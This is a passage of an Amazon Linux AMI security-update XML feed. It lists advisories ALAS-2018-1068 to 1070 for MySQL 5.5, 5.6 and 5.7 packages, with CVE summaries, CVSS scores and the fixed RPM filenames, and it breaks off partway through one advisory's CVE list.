arch="i686"><filename>Packages/php72-snmp-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-dba" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dba-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-mbstring" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mbstring-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-ldap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-ldap-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-mysqlnd" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-mysqlnd-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-json" version="7.2.8" release="1.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-json-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pgsql" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pgsql-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-intl" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-intl-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-common" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-common-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-odbc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-odbc-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-recode" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-recode-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-debuginfo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-debuginfo-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-fpm" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-fpm-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-gmp" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-gmp-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-dbg" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-dbg-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-process" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-process-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-devel" version="7.2.8" release="1.5.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-devel-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-xmlrpc" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-xmlrpc-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-cli" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-cli-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-enchant" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-enchant-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-pdo" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pdo-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-tidy" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-tidy-7.2.8-1.5.amzn1.i686.rpm</filename></package><package name="php72-soap" version="7.2.8" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/php72-soap-7.2.8-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1068</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1068: medium priority package update for mysql55</title><issued date="2018-08-22 19:33:00" /><updated date="2018-08-23 17:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3081:
Vulnerability in the MySQL Client component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client as well as unauthorized update, insert or delete access to some of MySQL Client accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1602424:
CVE-2018-3081 mysql: Client programs unspecified vulnerability (CPU Jul 2018)
CVE-2018-3070:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602369:
CVE-2018-3070 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2018)
CVE-2018-3066:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N).
1602366:
CVE-2018-3066 mysql: Server: Options unspecified vulnerability (CPU Jul 2018)
CVE-2018-3063:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Privileges). Supported versions that are affected are 5.5.60 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602363:
CVE-2018-3063 mysql: Server: Security: Privileges unspecified vulnerability (CPU Jul 2018)
CVE-2018-3058:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1602356:
CVE-2018-3058 mysql: MyISAM unspecified vulnerability (CPU Jul 2018)
CVE-2018-2767:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).
1564965:
CVE-2018-2767 mysql: use of SSL/TLS not enforced in libmysqld (Return of BACKRONYM)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2767" title="" id="CVE-2018-2767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3058" title="" id="CVE-2018-3058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3063" title="" id="CVE-2018-3063" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3066" title="" id="CVE-2018-3066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3070" title="" id="CVE-2018-3070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3081" title="" id="CVE-2018-3081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55-embedded-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.61" release="1.22.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.61-1.22.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.61-1.22.amzn1.i686.rpm</filename></package><package 
name="mysql55-embedded" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.61-1.22.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.61" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.61-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1069</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1069: medium priority package update for mysql56</title><issued date="2018-08-22 19:34:00" /><updated date="2018-08-23 17:59:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3081:
Vulnerability in the MySQL Client component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client as well as unauthorized update, insert or delete access to some of MySQL Client accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1602424:
CVE-2018-3081 mysql: Client programs unspecified vulnerability (CPU Jul 2018)
CVE-2018-3070:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602369:
CVE-2018-3070 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2018)
CVE-2018-3066:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N).
1602366:
CVE-2018-3066 mysql: Server: Options unspecified vulnerability (CPU Jul 2018)
CVE-2018-3064:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).
1602364:
CVE-2018-3064 mysql: InnoDB unspecified vulnerability (CPU Jul 2018)
CVE-2018-3062:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via memcached to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602360:
CVE-2018-3062 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2018)
CVE-2018-3058:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: MyISAM). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).
1602356:
CVE-2018-3058 mysql: MyISAM unspecified vulnerability (CPU Jul 2018)
CVE-2018-2767:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).
1564965:
CVE-2018-2767 mysql: use of SSL/TLS not enforced in libmysqld (Return of BACKRONYM)
CVE-2018-0739:
Constructed ASN.1 types with a recursive definition (such as can be found in PKCS7) could eventually exceed the stack given malicious input with excessive recursion. This could result in a Denial Of Service attack. There are no such structures used within SSL/TLS that come from untrusted sources so this is considered safe. Fixed in OpenSSL 1.1.0h (Affected 1.1.0-1.1.0g). Fixed in OpenSSL 1.0.2o (Affected 1.0.2b-1.0.2n).
1561266:
CVE-2018-0739 openssl: Handling of crafted recursive ASN.1 structures can cause a stack overflow and resulting denial of service
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0739" title="" id="CVE-2018-0739" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-2767" title="" id="CVE-2018-2767" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3058" title="" id="CVE-2018-3058" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3062" title="" id="CVE-2018-3062" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3064" title="" id="CVE-2018-3064" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3066" title="" id="CVE-2018-3066" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3070" title="" id="CVE-2018-3070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3081" title="" id="CVE-2018-3081" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql56" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.41" 
release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-common-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.41" release="1.30.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.41-1.30.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-server-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.41" release="1.30.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.41-1.30.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.41" release="1.30.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.41-1.30.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1070</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1070: medium priority package update for mysql57</title><issued date="2018-08-22 19:35:00" /><updated date="2018-08-23 18:26:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-3081:
Vulnerability in the MySQL Client component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Client. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Client as well as unauthorized update, insert or delete access to some of MySQL Client accessible data. CVSS 3.0 Base Score 5.0 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H).
1602424:
CVE-2018-3081 mysql: Client programs unspecified vulnerability (CPU Jul 2018)
CVE-2018-3077:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602375:
CVE-2018-3077 mysql: Server: DDL unspecified vulnerability (CPU Jul 2018)
CVE-2018-3071:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Audit Log). Supported versions that are affected are 5.7.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602370:
CVE-2018-3071 mysql: Audit Log unspecified vulnerability (CPU Jul 2018)
CVE-2018-3070:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602369:
CVE-2018-3070 mysql: Client mysqldump unspecified vulnerability (CPU Jul 2018)
CVE-2018-3066:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Options). Supported versions that are affected are 5.5.60 and prior, 5.6.40 and prior and 5.7.22 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.3 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:N).
1602366:
CVE-2018-3066 mysql: Server: Options unspecified vulnerability (CPU Jul 2018)
CVE-2018-3065:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602365:
CVE-2018-3065 mysql: Server: DML unspecified vulnerability (CPU Jul 2018)
CVE-2018-3064:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).
1602364:
CVE-2018-3064 mysql: InnoDB unspecified vulnerability (CPU Jul 2018)
CVE-2018-3062:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Memcached). Supported versions that are affected are 5.6.40 and prior, 5.7.22 and prior and 8.0.11 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via memcached to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H).
1602360:
CVE-2018-3062 mysql: Server: Memcached unspecified vulnerability (CPU Jul 2018)
CVE-2018-3061:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.7.22 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
1602359:
CVE-2018-3061 mysql: Server: DML unspecified vulnerability (CPU Jul 2018)
CVE-2018-3060:
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.7.22 and prior and 8.0.11 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all MySQL Server accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H).
1602357:
CVE-2018-3060 mysql: InnoDB unspecified vulnerability (CPU Jul 2018)
CVE-2018-3058:
